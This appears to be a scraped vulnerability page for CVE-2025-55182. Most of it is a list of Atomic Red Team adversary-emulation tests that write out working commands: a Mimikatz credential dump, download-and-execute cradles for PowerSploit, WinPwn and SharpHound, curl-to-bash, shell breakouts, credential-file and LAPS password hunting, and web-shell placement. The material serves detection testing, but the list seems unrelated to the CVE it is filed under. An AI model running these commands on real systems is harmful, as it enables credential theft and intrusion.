Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
Command (PowerShell)
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
T1059.001 NTFS Alternate Data Stream Access Windows PowerShell
Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Command (PowerShell)
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
T1059.001 PowerShell Command Execution Windows CMD
Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
Command (CMD)
powershell.exe -e  #{obfuscated_code}
T1059.001 PowerShell Fileless Script Execution Windows PowerShell
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
Command (PowerShell)
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
T1059.001 PowerShell Invoke Known Malicious Cmdlets Windows PowerShell Privileged
Powershell execution of known Malicious PowerShell Cmdlets
Command (PowerShell)
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
    "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
    $cmdlets}
T1059.001 PowerShell Session Creation and Use Windows PowerShell Privileged
Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Command (PowerShell)
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
T1059.001 PowerUp Invoke-AllChecks Windows PowerShell
Check for privilege escalation paths using PowerUp from PowerShellMafia
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
T1059.001 Powershell Invoke-DownloadCradle Windows Manual
Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 Powershell MsXml COM object - with prompt Windows CMD
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
T1059.001 Powershell XML requests Windows CMD
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
T1059.001 Powershell invoke mshta.exe download Windows CMD
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io
Command (CMD)
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
T1059.001 Run BloodHound from local disk Windows PowerShell
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful...
Command (PowerShell)
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
T1059.001 Run Bloodhound from Memory using Download Cradle Windows PowerShell
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution...
Command (PowerShell)
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
T1059.001 SOAPHound - Build Cache Windows PowerShell
Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. src: https://github.com/FalconForceTeam/SOAPHound
Command (PowerShell)
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
T1059.001 SOAPHound - Dump BloodHound Data Windows PowerShell
Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. src: https://github.com/FalconForceTeam/SOAPHound
Command (PowerShell)
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1087.002 Account Enumeration with LDAPDomainDump Linux Shell
This test uses LDAPDomainDump to perform account enumeration on a domain. [Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
Command (Shell)
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
T1087.002 Active Directory Domain Search Linux Shell
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
Command (Shell)
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
T1087.002 Adfind - Enumerate Active Directory Admins Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
T1087.002 Adfind - Enumerate Active Directory Exchange AD Objects Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
T1087.002 Adfind - Enumerate Active Directory User Objects Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
T1087.002 Adfind -Listing password policy Windows CMD
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy. reference- http://www.joeware.net/freetools/tools/adfind/,...
Command (CMD)
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
T1087.002 Automated AD Recon (ADRecon) Windows PowerShell
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its path will be displayed.
Command (PowerShell)
Invoke-Expression "#{adrecon_path}"
T1087.002 Enumerate Active Directory Users with ADSISearcher Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
T1087.002 Enumerate Active Directory for Unconstrained Delegation Windows PowerShell
Attackers may attempt to query for computer objects with the UserAccountControl property 'TRUSTED_FOR_DELEGATION' (0x80000;524288) set More Information -...
Command (PowerShell)
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
T1087.002 Enumerate Default Domain Admin Details (Domain) Windows CMD
This test will enumerate the details of the built-in domain admin account
Command (CMD)
net user administrator /domain
T1087.002 Enumerate Linked Policies In ADSISearcher Discovery Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 Enumerate Root Domain linked policies Discovery Windows PowerShell
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory. Upon successful execution a listing of users will output with their paths in AD. Reference:...
Command (PowerShell)
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
T1087.002 Enumerate all accounts (Domain) Windows CMD
Enumerate all accounts Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
Command (CMD)
net user /domain
net group /domain
T1087.002 Enumerate all accounts via PowerShell (Domain) Windows PowerShell
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
Command (PowerShell)
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
T1087.002 Enumerate logged on users via CMD (Domain) Windows CMD
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
Command (CMD)
query user /SERVER:#{computer_name}
T1087.002 Get-DomainUser with PowerView Windows PowerShell
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
T1087.002 Kerbrute - userenum Windows PowerShell
Enumerates active directory usernames using the userenum function of Kerbrute
Command (PowerShell)
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer all properties Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-ADComputer #{hostname} -Properties *
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
T1087.002 Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property Windows PowerShell
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 Suspicious LAPS Attributes Query with adfind all properties Windows PowerShell
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
T1087.002 Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd Windows PowerShell
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
Command (PowerShell)
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
T1087.002 Wevtutil - Discover NTLM Users Remote Windows PowerShell
This test discovers users who have authenticated against a Domain Controller via NTLM. This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
Command (PowerShell)
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
T1087.002 WinPwn - generaldomaininfo Windows PowerShell
Gathers general domain information using the generaldomaininfo function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (7)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2025-55182
facebook.com
GitHub CVE x_refsource_CONFIRM
https://www.facebook.com/security/advisories/cve-2025-55182
react.dev
GitHub CVE x_refsource_CONFIRM
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
openwall.com
NVD API Mailing List Patch Third Party Advisory
http://www.openwall.com/lists/oss-security/2025/12/03/4
news.ycombinator.com
NVD API Issue Tracking
https://news.ycombinator.com/item?id=46136026
aws.amazon.com
NVD API Third Party Advisory
https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-55182